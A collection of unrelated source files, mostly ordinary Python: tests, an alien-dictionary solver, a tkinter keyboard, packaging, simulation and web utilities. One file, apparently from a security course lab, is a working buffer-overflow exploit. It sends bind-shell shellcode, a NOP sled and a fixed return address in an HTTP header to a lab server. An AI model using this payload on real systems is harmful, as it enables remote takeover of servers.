    # test below assigns the boolean False — confirm this is intentional.
    DEBUG = 'True'
class TestServerErrorExceptionHook(unittest.TestCase):
    """Tests for ServerErrorExceptionHook with DEBUG toggled on and off."""
    def setUp(self):
        # Minimal container with a mock application config bound under
        # 'Application' so the hook can read DEBUG.
        self.app = App()
        self.app.bind('Container', self.app)
        self.app.bind('Request', Request(None).load_app(self.app).load_environ(generate_wsgi()))
        self.app.simple(Response)
        self.app.bind('Application', MockApplicationConfig)
        self.app.bind('ViewClass', View(self.app))
        self.app.bind('View', self.app.make('ViewClass').render)
    def test_response_is_set_when_app_debug_is_true(self):
        self.assertIsNone(ServerErrorExceptionHook().load(self.app))
    def test_no_response_set_when_app_debug_is_false(self):
        # Mutates the shared mock's class attribute, then rebinds it.
        # NOTE(review): this leaks DEBUG=False into later tests — confirm.
        application = MockApplicationConfig
        application.DEBUG = False
        self.app.bind('Application', application)
        self.assertIsNone(ServerErrorExceptionHook().load(self.app))
| StarcoderdataPython |
3311013 | <filename>facebook/alienDict.py
import collections
from collections import defaultdict, deque
class Solution(object):
    """LeetCode 269 'Alien Dictionary': recover the character ordering
    implied by a lexicographically sorted word list.

    Bugfixes vs. the original: `deque` was used without being imported
    (NameError at runtime), and invalid prefix pairs such as
    ["abc", "ab"] were not rejected.
    """

    def alienOrder(self, words):
        """Kahn's topological sort over a 26-slot indegree table.

        Returns a valid character ordering, or '' when the constraints
        are inconsistent (a cycle, or a word preceding its own proper
        prefix).
        """
        successors = {}           # letter index -> set of greater letters
        indegree = [0] * 26
        for word in words:
            for ch in word:
                successors.setdefault(ord(ch) - ord('a'), set())
        for w1, w2 in zip(words, words[1:]):
            for c1, c2 in zip(w1, w2):
                if c1 != c2:
                    k1 = ord(c1) - ord('a')
                    k2 = ord(c2) - ord('a')
                    if k2 not in successors[k1]:
                        successors[k1].add(k2)
                        indegree[k2] += 1
                    break
            else:
                # Shared prefix exhausted: the longer word must not come first.
                if len(w1) > len(w2):
                    return ""
        ready = deque(k for k in range(26) if k in successors and indegree[k] == 0)
        order = []
        while ready:
            k = ready.popleft()
            order.append(chr(k + ord('a')))
            for nxt in successors[k]:
                indegree[nxt] -= 1
                if indegree[nxt] == 0:
                    ready.append(nxt)
        # A partial ordering means a cycle was present.
        return ''.join(order) if len(order) == len(successors) else ""

    def alienOrder1(self, words):  # topo sort BFS
        """Same algorithm using defaultdict adjacency and a dict indegree."""
        adj = defaultdict(set)    # a -> set of letters greater than a
        deg = {c: 0 for w in words for c in w}
        for w1, w2 in zip(words, words[1:]):
            for c1, c2 in zip(w1, w2):
                if c1 == c2:
                    continue
                if c2 not in adj[c1]:
                    deg[c2] += 1
                adj[c1].add(c2)
                break
            else:
                # No differing character: w2 must not be a proper prefix of w1.
                if len(w1) > len(w2):
                    return ''
        res = ''
        # start w 0 indegree nodes
        q = deque([c for c in deg if not deg[c]])
        while q:
            c = q.popleft()
            res += c
            for n in adj[c]:
                deg[n] -= 1
                if not deg[n]:
                    q.append(n)
        return res if len(res) == len(deg) else ''
282913 | <reponame>not4YU5H/hacktoberfest2021-2
from tkinter import *
from tkinter import messagebox
import tkinter.messagebox as mbox
import tkinter as tk
# Main application window: fixed 1000x700 geometry.
root = Tk()
root.title("Virtual Keyboard")
root.geometry('1000x700')
class Keypad(tk.Frame):
    """On-screen keyboard frame that types into a target tk.Text widget."""
    # Key layout, one list per row: digits, lower case, upper case,
    # symbols and emoji.
    cells = [
        ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0'],
        ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm','n', 'o', 'p', 'q','r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'],
        ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M','N', 'O', 'P', 'Q','R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'],
        ['!', '@', '#', '$', '%', '&', '*', '/', '\'', '.', ',', ';', ':', '?', '<', '>','😀','😋','😂','🌞','🌴','🍕','🏳', '♻', '✔', '👍'],
    ]
    def __init__(self, *args, **kwargs):
        """Build the character buttons plus Space/tab/Backspace/Clear/Hide."""
        super().__init__(*args, **kwargs)
        self.target = None   # Text widget currently receiving keystrokes
        self.memory = ''     # clipboard-like buffer used by copy()/paste()
        for y, row in enumerate(self.cells):
            for x, item in enumerate(row):
                # Default argument binds each button to its own character.
                b = tk.Button(self, text=item, command=lambda text=item:self.append(text),font=("Arial", 14), bg = "light green", fg = "blue", borderwidth=3, relief="raised")
                b.grid(row=y, column=x, sticky='news')
        # Control buttons share row 0, to the right of the digit keys.
        x = tk.Button(self, text='Space', command=self.space,font=("Arial", 14), bg = "light green", fg = "blue", borderwidth=3, relief="raised")
        x.grid(row=0, column=10, columnspan='4', sticky='news')
        x = tk.Button(self, text='tab', command=self.tab,font=("Arial", 14), bg = "light green", fg = "blue", borderwidth=3, relief="raised")
        x.grid(row=0, column=14, columnspan='3', sticky='news')
        x = tk.Button(self, text='Backspace', command=self.backspace,font=("Arial", 14), bg = "light green", fg = "blue", borderwidth=3, relief="raised")
        x.grid(row=0, column=17,columnspan='3', sticky='news')
        x = tk.Button(self, text='Clear', command=self.clear,font=("Arial", 14), bg = "light green", fg = "blue", borderwidth=3, relief="raised")
        x.grid(row=0, column=20, columnspan='3', sticky='news')
        x = tk.Button(self, text='Hide', command=self.hide,font=("Arial", 14), bg = "light green", fg = "blue", borderwidth=3, relief="raised")
        x.grid(row=0, column=23, columnspan='3', sticky='news')
    def get(self):
        """Return the target's contents without the trailing newline."""
        if self.target:
            return self.target.get("1.0", "end-1c")
    def append(self, text):
        """Insert `text` at the end of the target widget."""
        if self.target:
            self.target.insert('end', text)
    def clear(self):
        """Delete everything in the target widget."""
        if self.target:
            self.target.delete('1.0', 'end')
    def backspace(self):
        """Remove the last character by rewriting the whole buffer."""
        if self.target:
            text = self.get()
            text = text[:-1]
            self.clear()
            self.append(text)
    def space(self):
        """Append a single space (via a full rewrite of the buffer)."""
        if self.target:
            text = self.get()
            text = text + " "
            self.clear()
            self.append(text)
    def tab(self): # 5 spaces
        # NOTE(review): the comment says 5 spaces; verify the literal below
        # actually contains the intended amount of padding.
        if self.target:
            text = self.get()
            text = text + " "
            self.clear()
            self.append(text)
    def copy(self):
        #TODO: copy to clipboad
        # NOTE(review): `self.label` is never created in __init__, so this
        # would raise AttributeError if wired to a button — confirm.
        if self.target:
            self.memory = self.get()
            self.label['text'] = 'memory: ' + self.memory
            print(self.memory)
    def paste(self):
        #TODO: copy from clipboad
        if self.target:
            self.append(self.memory)
    def show(self, entry):
        """Attach to `entry` and place the keypad centred in the window."""
        self.target = entry
        self.place(relx=0.5, rely=0.5, anchor='c')
    def hide(self):
        """Detach from the target and remove the keypad from the layout."""
        self.target = None
        self.place_forget()
#-------------------------------------------------------
def print_output():
    """Show the current textarea contents in an info message box."""
    mbox.showinfo("Text Entered", "Text Entered :\n\n" + text_enter.get('1.0',END))
# firstclick1 = True
# def on_text_enter_click(event):
# """function that gets called whenever entry1 is clicked"""
# global firstclick1
# if firstclick1: # if this is the first time they clicked it
# firstclick1 = False
# text_enter.delete('1.0', "end") # delete all the text in the entry
def des_f1():
    """Tear down the start screen so the editor frame becomes visible."""
    f1.destroy()
# --- Start screen (frame f1): title, splash image and START button. ---
f1 = Frame(root, height=700, width=1000)
f1.propagate(0)
f1.pack(side='top')
# start1 = Label(f1, text='VIRTUAL', font=("Arial", 100), fg="magenta")
# start1.place(x=250, y=100)
#
# start2 = Label(f1, text='KEYBOARD', font=("Arial", 100), fg="magenta")
# start2.place(x=150, y=300)
c = Canvas(f1, width=1000, height=700)
c.pack()
p1 = PhotoImage(file='Images/keyboard.gif')
c.create_image(200, 100, image=p1, anchor=NW)
start1 = Label(f1, text='VIRTUAL KEYBOARD', font=("Arial", 50), fg="magenta", underline = 0)
start1.place(x=150, y=10)
startb = Button(f1, text="START",command=des_f1,font=("Arial", 30), bg = "light green", fg = "blue", borderwidth=3, relief="raised")
startb.place(x = 180 , y =550 )
# --- Editor screen (frame f2): text area, keypad and action buttons.
# f2 is packed beneath f1 and becomes visible once START destroys f1. ---
f2 = Frame(root, height=700, width=1000)
f2.propagate(0)
f2.pack(side='top')
keypad = Keypad(root)
start2 = Label(f2, text='ENTER TEXT HERE...', font=("Arial", 40), fg="magenta")
start2.place(x=200, y=460)
text_enter = tk.Text(f2, height=10, width=80, font=("Arial", 15), bg="light yellow", fg="brown",borderwidth=3, relief="solid")
text_enter.insert(END, 'Enter your text here from virtual keyboard...') # default line in text area, can be cleared when touched
# text_enter.bind('<FocusIn>', on_text_enter_click)
text_enter.place(x=50, y=10)
keyboardb = Button(f2, text="KEYBOARD",command=lambda:keypad.show(text_enter),font=("Arial", 30), bg = "light green", fg = "blue", borderwidth=3, relief="raised")
keyboardb.place(x =100 , y =550 )
printb = Button(f2, text="PRINT",command=print_output,font=("Arial", 30), bg = "light green", fg = "blue", borderwidth=3, relief="raised")
printb.place(x =450 , y =550 )
def exit_win():
if messagebox.askokcancel("Exit", "Do you want to exit?"):
root.destroy()
exitb = Button(root, text="EXIT",command=exit_win,font=("Arial", 30), bg = "red", fg = "blue", borderwidth=3, relief="raised")
exitb.place(x =700 , y =550 )
root.protocol("WM_DELETE_WINDOW", exit_win)
root.mainloop()
| StarcoderdataPython |
6539517 | # When pip installs anything from packages, py_modules, or ext_modules that
# includes a twistd plugin (which are installed to twisted/plugins/),
# setuptools/distribute writes a Package.egg-info/top_level.txt that includes
# "twisted". If you later uninstall Package with `pip uninstall Package`,
# pip <1.2 removes all of twisted/ instead of just Package's twistd plugins.
# See https://github.com/pypa/pip/issues/355 (now fixed)
#
# To work around this problem, we monkeypatch
# setuptools.command.egg_info.write_toplevel_names to not write the line
# "twisted". This fixes the behavior of `pip uninstall Package`. Note that
# even with this workaround, `pip uninstall Package` still correctly uninstalls
# Package's twistd plugins from twisted/plugins/, since pip also uses
# Package.egg-info/installed-files.txt to determine what to uninstall,
# and the paths to the plugin files are indeed listed in installed-files.txt.
from distutils import log
from setuptools import setup
from setuptools.command.install import install
class InstallTwistedPlugin(install, object):
    """Custom ``install`` command that refreshes Twisted's plugin cache.

    Twisted discovers twistd plugins through a ``dropin.cache`` file. After a
    site-wide install that cache may be stale and unwritable by normal users,
    so it is rebuilt once here while install-time privileges are available.
    """

    def run(self):
        super(InstallTwistedPlugin, self).run()
        # Make Twisted regenerate the dropin.cache, if possible. This is necessary
        # because in a site-wide install, dropin.cache cannot be rewritten by
        # normal users.
        log.info("Attempting to update Twisted plugin cache.")
        try:
            from twisted.plugin import IPlugin, getPlugins
            # Iterating the plugins forces Twisted to rescan and rewrite
            # dropin.cache.
            list(getPlugins(IPlugin))
            log.info("Twisted plugin cache updated successfully.")
        except Exception as e:  # was `except Exception, e` - Python-2-only syntax
            log.warn("*** Failed to update Twisted plugin cache. ***")
            log.warn(str(e))
# Replace setuptools' top_level.txt writer so "twisted" is never listed as one
# of this package's top-level names (see the workaround notes at the top of the
# file: old pips would otherwise delete all of twisted/ on uninstall).
try:
    from setuptools.command import egg_info
    egg_info.write_toplevel_names
except (ImportError, AttributeError):
    # setuptools version cannot be patched; keep default behavior.
    pass
else:
    def _top_level_package(name):
        # "a.b.c" -> "a"
        return name.split('.', 1)[0]
    def _hacked_write_toplevel_names(cmd, basename, filename):
        # Same as the stock implementation, minus any "twisted" entry.
        pkgs = dict.fromkeys(
            [_top_level_package(k)
             for k in cmd.distribution.iter_distribution_names()
             if _top_level_package(k) != "twisted"
            ]
        )
        cmd.write_file("top-level names", filename, '\n'.join(pkgs) + '\n')
    egg_info.write_toplevel_names = _hacked_write_toplevel_names
# Now actually define the setup
import txsockjs
import os
setup(
    # Packaging metadata for the txsockjs distribution.
    author="<NAME>",
    author_email="<EMAIL>",
    name="txsockjs",
    version=txsockjs.__version__,
    description="Twisted SockJS wrapper",
    long_description=open(os.path.join(os.path.dirname(__file__), 'README.rst')).read(),
    url="http://github.com/Fugiman/sockjs-twisted",
    license='BSD License',
    platforms=['OS Independent'],
    # twisted.plugins is listed so the twistd plugin files are installed into
    # Twisted's plugin directory (hence the uninstall workaround above).
    packages=["txsockjs","txsockjs.protocols","twisted.plugins"],
    install_requires=[
        "Twisted",
    ],
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Framework :: Twisted",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: BSD License",
        "Operating System :: OS Independent",
        "Programming Language :: Python",
        "Topic :: Internet",
    ],
    # Custom install command defined above refreshes Twisted's dropin.cache.
    cmdclass = {
        'install': InstallTwistedPlugin,
    },
)
| StarcoderdataPython |
1783350 | <reponame>jin10086/py-evm
from eth.tools.fixtures.helpers import (
get_test_name,
)
from eth.tools.fixtures.normalization import (
normalize_bytes,
normalize_call_creates,
normalize_environment,
normalize_execution,
normalize_int,
normalize_logs,
normalize_state,
)
from eth.tools._utils.hashing import hash_log_entries
from eth.tools._utils.mappings import deep_merge
def fill_vm_test(
        filler,
        *,
        call_creates=None,
        gas_price=None,
        gas_remaining=0,
        logs=None,
        output=b""):
    """Expand a VM-test *filler* into a fully normalized test fixture.

    Normalizes the environment, pre-state and execution sections, merges the
    single expected result into the pre-state to form the post-state, and
    hashes the expected log entries.

    Note: ``gas_price`` is accepted but unused here (as in the original API).
    """
    test_name = get_test_name(filler)
    raw_test = filler[test_name]

    environment = normalize_environment(raw_test["env"])
    pre_state = normalize_state(raw_test["pre"])
    execution = normalize_execution(raw_test["exec"])

    # VM tests carry exactly one expectation and no fork/index selectors.
    assert len(raw_test["expect"]) == 1
    expectation = raw_test["expect"][0]
    assert "network" not in raw_test
    assert "indexes" not in raw_test

    post_state = deep_merge(pre_state, normalize_state(expectation["result"]))

    return {
        test_name: {
            "env": environment,
            "pre": pre_state,
            "exec": execution,
            "post": post_state,
            "callcreates": normalize_call_creates(call_creates or []),
            "gas": normalize_int(gas_remaining),
            "output": normalize_bytes(output),
            "logs": hash_log_entries(normalize_logs(logs or [])),
        }
    }
| StarcoderdataPython |
6505596 | <reponame>unworld11/Basic-Attendance<gh_stars>1-10
# Attendance for Zoom: interactively collect (roll number, name) pairs.
print("Attendance Register")

Headers = ['Roll No.', 'Name']
Column = []

students = int(input("Number of Students in class ::: "))
for _ in range(students):
    roll_no = int(input("Enter Roll No. : "))
    student_name = input("Enter Name :: ")
    Column.append([roll_no, student_name])

print(Column)
| StarcoderdataPython |
1809410 | <reponame>iver56/wikipendium.no<filename>wikipendium/wiki/context_processors.py<gh_stars>10-100
import wikipendium.settings as settings
def google_analytics_processor(request):
    """Django context processor exposing Google Analytics settings to templates.

    Returns an empty dict when the GA settings are not configured (e.g. in
    development) so template rendering still succeeds.
    """
    try:
        return {'GOOGLE_ANALYTICS_KEY': settings.GOOGLE_ANALYTICS_KEY,
                'GOOGLE_ANALYTICS_NAME': settings.GOOGLE_ANALYTICS_NAME}
    except AttributeError:
        # The settings module has no GA configuration. The original used a
        # bare ``except:`` which would also hide unrelated errors.
        return {}
| StarcoderdataPython |
5176822 | <filename>yelp/errors.py
''' Custom exception module '''
# --- python module imports
from flask import jsonify
# --- local module imports
from yelp import app
class InvalidUsage(Exception):
    """API error carrying an HTTP status code and optional extra payload.

    Raise anywhere in a request handler; the registered Flask error handler
    converts it into a JSON response.
    """

    # Default HTTP status when none is supplied.
    status_code = 400

    def __init__(self, message, status_code=None, payload=None):
        # Pass the message to Exception so str(exc) and logging show it
        # (the original called Exception.__init__(self) with no args).
        super(InvalidUsage, self).__init__(message)
        self.message = message
        if status_code is not None:
            self.status_code = status_code
        self.payload = payload

    def to_dict(self):
        """Return a JSON-serializable dict: payload plus message/status_code."""
        rv = dict(self.payload or ())
        rv['message'] = self.message
        rv['status_code'] = self.status_code
        return rv
@app.errorhandler(InvalidUsage)
def handle_invalid_usage_error(error):
    """Convert an InvalidUsage exception into a JSON error response.

    Registered app-wide; serializes the exception (payload + message +
    status_code) and mirrors its status code onto the HTTP response.
    """
    response = jsonify(error.to_dict())
    response.status_code = error.status_code
    return response
| StarcoderdataPython |
11202091 | import sys
import reader
# Open the file named on the command line, print its contents, and make sure
# the reader is closed even if read() raises.
source = reader.Reader(sys.argv[1])
try:
    print(source.read())
finally:
    source.close()
324991 | # -*- coding: utf8 -*-
#time:2017/9/19 11:34
#VERSION:1.0
#__OUTHOR__:guangguang
#Email:<EMAIL>
from numpy import *
# load data: read tab-separated features and labels from a file
def loadDataSet(fileName):
    """Load a tab-separated data file into feature rows and labels.

    Every column except the last is treated as a float feature; the last
    column is the float label.

    Args:
        fileName: path to a TSV file with at least two columns per line.

    Returns:
        (dataMat, labelMat): list of feature-row lists and list of labels.
    """
    dataMat = []
    labelMat = []
    # Open the file once (the original opened it twice - readline to count
    # columns, then readlines - and never closed either handle) and derive
    # the feature count from the first line.
    with open(fileName) as fd:
        numFeat = None
        for line in fd:
            curLine = line.strip().split('\t')
            if numFeat is None:
                numFeat = len(curLine) - 1
            dataMat.append([float(curLine[i]) for i in range(numFeat)])
            labelMat.append(float(curLine[-1]))
    return dataMat, labelMat
# linear regression: compute the regression coefficients
def linearRegres(xVec, yVec):
    """Ordinary least squares via the normal equation.

    Returns the coefficient column matrix, or None (after printing a
    warning) when X^T X is singular and cannot be inverted.
    """
    x_matrix = mat(xVec)
    y_matrix = mat(yVec).T
    gram = x_matrix.T * x_matrix
    if linalg.det(gram) == 0:  # singular matrix has no inverse
        print('This matrix is singular, cannot do inverse')
        return
    return gram.I * x_matrix.T * y_matrix
#DEBUG
if __name__ == "__main__":
pass | StarcoderdataPython |
346313 | import sys
def main():
    """Validate that the CLI-supplied version matches the generated ``semver`` file.

    Exits with a non-zero status (via sys.exit message) when the argument is
    missing or does not match; prints a confirmation on success.
    """
    if len(sys.argv) < 2:
        sys.exit("Too few arguments, please provide a valid semantic version")

    version = sys.argv[1]

    # Context manager closes the file even if reading fails (the original
    # closed it manually).
    with open("semver", "r", newline="\n") as semver_file:
        semver = semver_file.read()

    if semver != version:
        sys.exit("Given semantic version " + version + " is not matching generated version " + semver)
    else:
        print("Validation successful. Semantic version: " + version)
main()
| StarcoderdataPython |
4870645 | # -*- coding: utf-8 -*-
# Licensed under the MIT license
# http://opensource.org/licenses/mit-license.php
# Copyright 2008, <NAME> <<EMAIL>>
# Copyright 2014, <NAME> <<EMAIL>>
from coherence.upnp.devices.basics import DeviceHttpRoot, BasicDevice
from coherence.upnp.services.servers.switch_power_server import SwitchPowerServer
from coherence.upnp.services.servers.dimming_server import DimmingServer
class HttpRoot(DeviceHttpRoot):
    """HTTP resource root for the dimmable-light UPnP device."""
    logCategory = 'dimmablelight'
class DimmableLight(BasicDevice):
    """UPnP DimmableLight:1 device exposing SwitchPower and Dimming services."""
    logCategory = 'dimmablelight'
    device_type = 'DimmableLight'
    version = 1
    model_description = 'Coherence UPnP %s' % device_type
    model_name = 'Coherence UPnP %s' % device_type
    # (attribute name, service server class) pairs - presumably instantiated
    # by BasicDevice; confirm against coherence.upnp.devices.basics.
    _service_definition = (
        ('switch_power_server', SwitchPowerServer),
        ('dimming_server', DimmingServer),
    )
    _httpRoot = HttpRoot
| StarcoderdataPython |
1635652 | from __future__ import absolute_import
from __future__ import print_function
import os
from shutil import copyfile
from testing_simulation import Simulation
from generator import TrafficGenerator
from model import TestModel
from visualization import Visualization
from utils import import_test_configuration, set_sumo, set_test_path
if __name__ == "__main__":
    # Load test-time settings and resolve the SUMO command line plus the
    # directory of the trained model under evaluation.
    config = import_test_configuration(config_file='testing_settings.ini')
    sumo_cmd = set_sumo(config['gui'], config['sumocfg_file_name'], config['max_steps'])
    model_path, plot_path = set_test_path(config['models_path_name'], config['model_to_test'])
    Model = TestModel(
        input_dim=config['num_states'],
        model_path=model_path
    )
    TrafficGen = TrafficGenerator(
        config['max_steps'],
        config['n_v_generated']
    )
    # NOTE(review): these two assignments shadow the imported class names
    # (Visualization, Simulation), so no second instance can be created later.
    Visualization = Visualization(
        plot_path,
        dpi=96
    )
    Simulation = Simulation(
        Model,
        TrafficGen,
        sumo_cmd,
        config['max_steps'],
        config['green_duration'],
        config['yellow_duration'],
        config['num_states'],
        config['num_actions']
    )
    print('\n----- Test episode')
    # Run one evaluation episode with the configured episode seed.
    simulation_time = Simulation.run(config['episode_seed']) # run the simulation
    print('Simulation time:', simulation_time, 's')
    print("----- Testing info saved at:", plot_path)
    # Archive the settings used for this test next to its plots/data.
    copyfile(src='testing_settings.ini', dst=os.path.join(plot_path, 'testing_settings.ini'))
    # NOTE(review): 'lenght' typo below is a runtime plot label, left as-is.
    Visualization.save_data_and_plot(data=Simulation.reward_episode, filename='reward', xlabel='Action step', ylabel='Reward')
    Visualization.save_data_and_plot(data=Simulation.queue_length_episode, filename='queue', xlabel='Step', ylabel='Queue lenght (vehicles & pedestrians)')
| StarcoderdataPython |
5138293 | <filename>installer/steps/b_pip.py
from helper import *
# Install the project's Python dependencies; should_not_fail() presumably
# aborts the installer on a pip error - see helper for exact semantics.
section("Install requirements")
shell("pip install -U -r installer/requirements.txt", True).should_not_fail()
| StarcoderdataPython |
3591415 | <reponame>Facco98/OffTech
#!/usr/bin/python
import requests
host='192.168.56.10'
port=8081
# Our return address ( shifted from beginning of buffer )
ret_address = b'\x50\xca\x5d\xf7\xff\x7f'
ret_addr_length = 6;
inital_nop_slide_length = 500
# Our shellcode to bind a shell on port 31337
shellcode=b'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'
shellcode_length = 150
# With 1136 bytes we overwrite the the whole return address
# We cannot do this: cannot insert \x00 in the string
total_bytes = 1136 - (8 - ret_addr_length)
# Creating the initial NOP slide
initial_nop_sled=b'\x90' * inital_nop_slide_length
# Creating the padding NOP slide
padding_nop_sled=b'\x90' * ( total_bytes - ret_addr_length - inital_nop_slide_length -shellcode_length )
# Combining everything together
exploit_string = initial_nop_sled+shellcode+padding_nop_sled+ret_address
print('About to exploit, connect to ' + host + ' on port 31337')
# Launching the POST request with malicious header
requests.post('http://' + host + ':' + str(port), headers={'Content-Length': exploit_string})
| StarcoderdataPython |
3277214 | import numpy as np
from multiagent.core import World, Landmark
from multiagent.scenario import BaseScenario
from particle_environments.mager.world import MortalAgent, HazardousWorld
from particle_environments.mager.observation import format_observation
from particle_environments.common import is_collision, distance, delta_pos
from particle_environments.common import DefaultParameters as DP
class Obstacle(Landmark):
    """Landmark-derived obstacle with a discovery flag."""
    def __init__(self):
        super().__init__()
        # Whether agents have discovered this obstacle; only known obstacles
        # contribute a repulsive term in Scenario.reward.
        self.known = False
class ObstacleWorld(World):
    """World variant that tracks obstacles alongside agents and landmarks."""
    def __init__(self):
        super().__init__()
        self.obstacles = []
    @property
    def entities(self):
        # Obstacles are included in the full entity list alongside agents
        # and landmarks (presumably used by the core physics loop).
        return self.agents + self.landmarks + self.obstacles
class Scenario(BaseScenario):
    """Cooperative spread scenario: agents minimize distance to landmarks,
    avoid collisions, and are repelled by obstacles once those are known."""
    # Scenario population constants.
    num_agents = 10
    num_landmarks = 3
    num_obstacles = 1
    def make_world(self):
        """Build the world with landmarks and obstacles; agents are created
        in reset_world."""
        # NOTE(review): HazardousWorld is used even though ObstacleWorld is
        # defined above; obstacles are attached dynamically - confirm this
        # is intentional.
        world = HazardousWorld()
        # observation-based communication
        world.dim_c = 0
        world.max_communication_distance = DP.max_communication_distance
        # add landmarks
        world.landmarks = [Landmark() for i in range(self.num_landmarks)]
        for i, landmark in enumerate(world.landmarks):
            landmark.name = 'landmark %d' % i
            landmark.collide = True
            landmark.movable = False
            landmark.size = DP.landmark_size
        # add obstacles
        world.obstacles = [Obstacle() for i in range(self.num_obstacles)]
        for i, obstacle in enumerate(world.obstacles):
            obstacle.name = 'obstacle %d' % i
            obstacle.collide = True
            obstacle.size = 0.05
        # make initial conditions
        self.reset_world(world)
        return world
    def reset_world(self, world):
        """Recreate all agents and randomize entity positions and colors."""
        # add agents with random properties
        world.agents = [MortalAgent() for i in range(self.num_agents)]
        for i, agent in enumerate(world.agents):
            agent.name = 'agent %d' % i
            agent.terminated = False
            agent.collide = True
            agent.silent = True
            agent.size = DP.agent_size
            agent.color = np.array([0.35, 0.35, 0.85])
        # random properties for landmarks
        for i, landmark in enumerate(world.landmarks):
            landmark.color = np.array([0.25, 0.25, 0.25])
        # one randomly chosen landmark is highlighted green as the goal
        goal = np.random.choice(world.landmarks)
        goal.color = np.array([0.15, 0.65, 0.15])
        for i, obstacle in enumerate(world.obstacles):
            obstacle.color = np.array([0.90, 0.40, 0.40])
        # set random initial states
        for agent in world.agents:
            agent.state.p_pos = np.random.uniform(-1, +1, world.dim_p)
            agent.state.p_vel = np.zeros(world.dim_p)
            agent.state.c = np.zeros(world.dim_c)
        for landmark in world.landmarks:
            landmark.state.p_pos = np.random.uniform(-1, +1, world.dim_p)
            landmark.state.p_vel = np.zeros(world.dim_p)
        for obstacle in world.obstacles:
            obstacle.state.p_pos = np.random.uniform(-1, +1, world.dim_p)
            obstacle.state.p_vel = np.zeros(world.dim_p)
    def benchmark_data(self, agent, world):
        """Return (reward, collisions, summed min distances, occupied
        landmarks) diagnostics for *agent*."""
        rew = 0
        collisions = 0
        occupied_landmarks = 0
        min_dists = 0
        for l in world.landmarks:
            dists = [np.linalg.norm(a.state.p_pos - l.state.p_pos) for a in world.agents]
            min_dists += min(dists)
            rew -= min(dists)
            # a landmark counts as occupied when some agent is within 0.1
            if min(dists) < 0.1:
                occupied_landmarks += 1
        if agent.collide:
            for a in world.agents:
                if is_collision(a, agent):
                    rew -= 1
                    collisions += 1
        return (rew, collisions, min_dists, occupied_landmarks)
    def reward(self, agent, world):
        # Agents are rewarded based on minimum agent distance to each landmark, penalized for collisions
        rew = 0
        for l in world.landmarks:
            dists = [np.linalg.norm(a.state.p_pos - l.state.p_pos) for a in world.agents]
            rew -= min(dists)
        # Known obstacles reward distance from them (repulsion).
        # NOTE(review): nothing in this file ever sets Obstacle.known = True;
        # confirm discovery is handled elsewhere.
        for o in world.obstacles:
            if o.known:
                dists = [np.linalg.norm(a.state.p_pos - o.state.p_pos) for a in world.agents]
                rew += min(dists)
        if agent.collide:
            for a in world.agents:
                if is_collision(a, agent):
                    rew -= 1
        return rew
    def observation(self, agent, world):
        """Assemble *agent*'s observation: own position, landmark offsets,
        and zero-padded communications from nearby living agents."""
        def communications_observed(other_agent):
            ''' fill in information communicated between agents
            '''
            comms = delta_pos(other_agent, agent).tolist()
            comms += [other_agent.state.c]
            # will only work with zero-padding formatting
            # TODO: I think non-communication should send None instead of zero, because zero has real meaning
            # however this causes a problem with action function
            if distance(agent, other_agent) > world.max_communication_distance:
                comms = [0] * len(comms)
            return comms
        landmark_positions = format_observation(observe = lambda landmark: delta_pos(landmark, agent).tolist(),
                                                objects = world.landmarks,
                                                num_observations = len(world.landmarks),
                                                observation_size = world.dim_p)
        communications = format_observation(observe = communications_observed,
                                            objects = [a for a in world.agents if (a is not agent and not a.terminated)],
                                            num_observations = self.num_agents,
                                            observation_size = world.dim_p + 1,
                                            sort_key = lambda o: distance(agent, o))
        return np.asarray(agent.state.p_pos.tolist() + landmark_positions + communications)
| StarcoderdataPython |
6559869 | import requests
import json
# Pull OpenWeatherMap credentials and location from the shared config file.
with open("../config.json") as fp:
    file = json.load(fp)
APIKEY = file["ApiKey"]
CITY = file["city"]
LOCATION = file["country"]
UNIT = "metric"
BASEURL = f"http://api.openweathermap.org/data/2.5/weather?q={CITY},{LOCATION}&APPID={APIKEY}&units={UNIT}"
# Single fetch at import time; the getters below read from this cached result.
result = requests.get(BASEURL).json()
def get_temp():
    """Return the current temperature from the cached API result (metric units)."""
    return result["main"]["temp"]
def get_desc():
    """Return the short weather condition name from the cached API result."""
    return result["weather"][0]["main"]
def get_icon():
    """Return the local image path for the current weather condition icon."""
    icon = result["weather"][0]["icon"]
    # OpenWeatherMap icon codes are a two-digit condition plus a "d"/"n"
    # (day/night) suffix; both variants share the same local image, so key
    # on the leading digits only instead of duplicating every entry.
    # NOTE(review): the original mapped "02n" to "few_clounds.png" while
    # "02d" used "few_clouds.png" - treated here as a typo; confirm the
    # asset filename on disk.
    names = {
        "01": "clear_sky",
        "02": "few_clouds",
        "03": "clouds",
        "04": "broken_clouds",
        "09": "shower_rain",
        "10": "rain",
        "11": "thunderstorm",
        "13": "snow",
        "50": "fog",
    }
    return "static/img/" + names[icon[:2]] + ".png"
368713 | <filename>app/core/middleware.py
from django.utils.deprecation import MiddlewareMixin
from django.http import HttpResponse
class AdminPermissionCheckMiddleware(MiddlewareMixin):
    """Returns 401 for SSO-authenticated non-staff users hitting admin URLs."""
    SSO_UNAUTHORISED_ACCESS_MESSAGE = (
        'This application now uses internal Single Sign On. Please speak '
        'to the GREAT Team so that we can enable your account.'
    )
